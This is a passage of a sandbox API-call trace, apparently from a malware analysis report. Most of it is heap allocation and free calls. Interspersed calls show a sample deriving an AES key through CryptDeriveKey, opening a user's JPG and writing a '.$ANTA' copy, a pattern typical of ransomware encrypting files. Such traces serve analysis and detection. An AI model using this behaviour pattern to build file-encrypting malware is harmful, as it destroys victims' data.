(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca6b8 [0088.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0088.998] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0088.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.999] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0088.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0089.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0089.001] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0089.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e88 [0089.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0089.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.003] CryptDestroyHash (hHash=0x41ac740) returned 1 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0089.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.004] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ki1iqisuyi.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0089.004] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.004] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.004] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0089.004] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.005] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\ki1iqisuyi.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.006] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0089.006] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.009] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0089.009] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xd297, lpOverlapped=0x0) returned 1 [0089.011] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0089.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0089.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 